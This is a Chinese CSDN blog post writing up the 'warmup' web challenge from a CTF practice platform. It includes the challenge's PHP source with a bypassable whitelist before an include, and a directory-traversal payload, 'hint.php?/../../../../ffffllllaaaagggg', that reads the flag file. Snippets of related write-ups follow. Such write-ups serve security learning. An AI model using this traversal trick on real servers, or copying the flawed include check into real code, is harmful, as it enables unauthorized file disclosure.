攻防世界 web进阶 warmup

最新推荐文章于 2024-07-15 00:45:12 发布
最新推荐文章于 2024-07-15 00:45:12 发布
阅读量179 收藏
点赞数 1
文章标签: 前端 php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hrain7/article/details/121364679
版权
这篇博客介绍了攻防世界Web进阶区的warmup挑战,通过查看源代码发现source.php和php代码,进行了代码审计。尽管代码解析复杂,但通过参考他人解决方案,发现了hint.php,并利用file://伪协议构造payload,成功获取flag。挑战涉及前端、PHP和安全技术。
摘要由CSDN通过智能技术生成

攻防世界 web进阶区 warmup - 昊辰的小站

大佬wp超详细!!!!看大佬的wp吧!!!!

 打开页面就是这个表情,emm.....,然后查看源代码 发现source.php

 接着访问source.php 发现了php代码,开始代码审计

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

emm...... 这个代码的解析还是看大佬的wp吧,再次附上大佬的wp!!!

攻防世界 web进阶区 warmup - 昊辰的小站

PHP代码中还提到了一个hint.php,访问hint.php试试看

 flag不在这里,在ffffllllaaaagggg里

然后使用 file:// 伪协议

payload: ?file=hint?/../../../../ffffllllaaaagggg

ffffllllaaaagggg就是提示要上翻四层目录

http://111.200.241.244:61929/source.php/?file=hint.php?/../../../../ffffllllaaaagggg

 得到flag

[  。。。不是很懂代码。。。 ]

Hrain777
关注
HCTF2018 WarmUp
BlueDoorZz的博客
07-11 496
BUU第一题,老实说第一次做的时候手足无措。 0x01 题目类型:php代码审计,文件包含。 0x02 点开链接,开门见山就是一个大大的滑稽。 查看源代码,注释中提醒有source.php文件。访问source.php,看到源码。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) {
攻防世界-Web进阶区-warmup题解
Jollowin的博客
11-26 844
warmup题解 我们进入到题目界面会看到一张猥琐的笑脸,假装没看到他直接按F12。 这里我们发现了一条线索:source.php。 好家伙,那我们不妨到source.php看一看: 进行代码审计,初步发现我们可以提交一个名为file的变量,若变量file的值为source.php或hint.php则会执行include $_REQUEST[‘file’]。 那我们不妨令file=hint.php看一看。 1.如上图我们发现底部出现了一行提示,那我们现在的目的就变成了让 include $_REQUE
WEB_HCTF_2018_WarmUp
Pz_mstr's Blog
03-06 741
Categories web-代码审计 write up source code get source code http://eb22847d-9f8a-4ecf-b972-5ecebfcf5faf.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { publi...
攻防世界warmup解题思路(文件包含,php代码审计)
最新发布
2301_80307383的博客
07-15 438
大概意思为截取page参数中出现?号前的字符串,没有则返回原字符串,并检测page中数据是否在白名单中,接着url解码后又一次重复该过程也就是要验证两次。mb_strpos($haystack,$needle,$offset,$encoding):int|false:返回。2.观察emm类发现有四个if条件,前两个检测参数是否存在且在白名单中,可以先包含白名单中的文件名称进行测试。截取结果仍为hint.php可通过白名单,满足emm类后最底部代码进行文件包含,但发现flag。
HCTF 2018-warmup
m0_73303597的博客
12-07 417
自用
【HCTF 2018】WarmUp
Lixunzhe0112的博客
01-17 1394
原理如下:在我们将参数传给file时,服务器端会自动进行一次url解码,然后这里还有个urldecode再进行一次解码。_REQUEST[‘file’])&& emmm::checkFile($_REQUEST[‘file’]三个条件同时为真,才会包含我们传入的file。/flag.php’)和include(‘…所以:/var/www/flag.php 和…/var/www/flag.php是一个文件,上层没有了。说明flag.php在 /var/html类似目录中,只有两层,var为最上层了。
攻防世界WEBwarmup
qq_54929891的博客
09-03 1185
warmup热身,打开题目就是一个大大的滑稽,便打开F12看看了 发现注释了一个source.php,便进入这个地方看看去 发现一大串代码,这种情况下我都是不看函数的,直接先看后面 他是一个if语句判断,通过的条件是file传入的get参数存在,并且是字符串形式,并且还要让emm类的checFile语句返回为真,才能让file参数包含进去(三个条件缺一不可),否则输出一个图片,其实一开始我在想会不会flag就在这个图片里面,前面都是误导我的,然后直接复制粘贴那个链接,结果就是滑稽的..
攻防世界web进阶区全讲解(超详细的哇)!!(持续更新)
wo41ge的博客
10-13 2473
进入题目链接 有登录 就可能有注册界面 url栏register.php 或者直接上御剑扫一下 同样发现注册界面 注册成功后 进行登录 跳转到了这个界面
攻防世界Web进阶篇2(3分题)
chuxuezheerer的博客
02-07 635
3分题 一.Web_python_template_injection 二.Web_php_unserialize 三.php_rce 四.Web_php_include 五.ics-06 六.warmup 七.lottery 八.mfw 九.web2 十 .PHP2
攻防世界-web进阶
楼阁de猫的博客
10-30 980
目录baby_webTraining-WWW-Robots baby_web 题目描述:想想初始页面是哪个 打开链接看到这个界面 这里有两种解法 法一:我们输入index.php ,就会立即跳转到1.php 那我们就对index.php抓包看看 在请求头看到flag:flag{very_baby_web} 法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到 Training-WWW-Robots 打开链接是这样一个
攻防世界web解题[进阶](二)
weixin_46703850的博客
03-05 740
攻防世界web解题[进阶](二)
BMZCTF hctf_2018_warmup 1
qq_24033605的博客
04-07 203
hctf_2018_warmup 1 一进去一个诡异的”日常“笑脸。 (现在看到这个笑脸就感觉出题人没干好事) 基操:查看源代码,发现有个source.php,进去看看是怎么回事吧。 好家伙,代码审计题呗。 大概就是列了个白名单,通过file注入点,先看看hint.php里藏了什么。 告诉咱flag的路径在哪了。接下来只要构建出符合checkFile的函数的payload就行了。 从函数来看需要绕过两次白名单认证,就能得到flag值。 payload如下:source.php?file=hint.p
[HCTF 2018] WarmUp
Knsec
05-13 2295
[HCTF 2018] WarmUp 开局一张图,先看看页面源码信息 给出了一个 source.php 应该是后端的源码,这题代码审计了 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"
攻防世界-web高手进阶篇-warmup
热门推荐
qq_42016346的博客
02-06 1万+
打开题目链接后只有一个滑稽??(那就看看它里面有啥吧) 想啥呢,是审查源码啦 可以看到有注释source.php,访问后可以看到其源码 又发现一个hint.php文件,先访问再说 提示我们flag在ffffllllaaaagggg里面,此时题目已经完成一半啦 接着看回source.php源码 可以看到最后的include 是可以动态构造参数的,那应该就是解题关键了 不...
web:[HCTF 2018]WarmUp
sleepywin的博客
09-21 331
根据提示信息,进行目录穿越可获得flag,这里flag写了四次,可能使用四个或五个../跳转至该页面,页面显示为一段php代码,需要进行代码审计。查看网页源代码,发现source.php,尝试访问一下。点进页面,页面只有一张滑稽脸,没有其他的提示信息。先访问hint.php看看有没有别的提示信息。
攻防世界-web-warmup
wuh2333的博客
05-24 380
攻防世界warmup
HCTF2018-warmup-writeup
wuerror的博客
01-22 3459
这个题目原型是phpmyadmin4.8.1的任意文件包含漏洞  点击hint进入,得到提示flag在ffffllllaaaagggg中,并发现URL格式为XXX/index.php?file=hint.php,顺势猜一下file=source.php有没有结果。得到如下 &lt;?php class emmm { public static functi...
[HCTF 2018]Warmup
m0_73612768的博客
01-05 798
目录穿越;
攻防世界warmup
08-11
- *1* *2* *3* [攻防世界Webwarmup、NewsCenter、upload1”题解](https://blog.csdn.net/qq_53325209/article/details/124410851)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值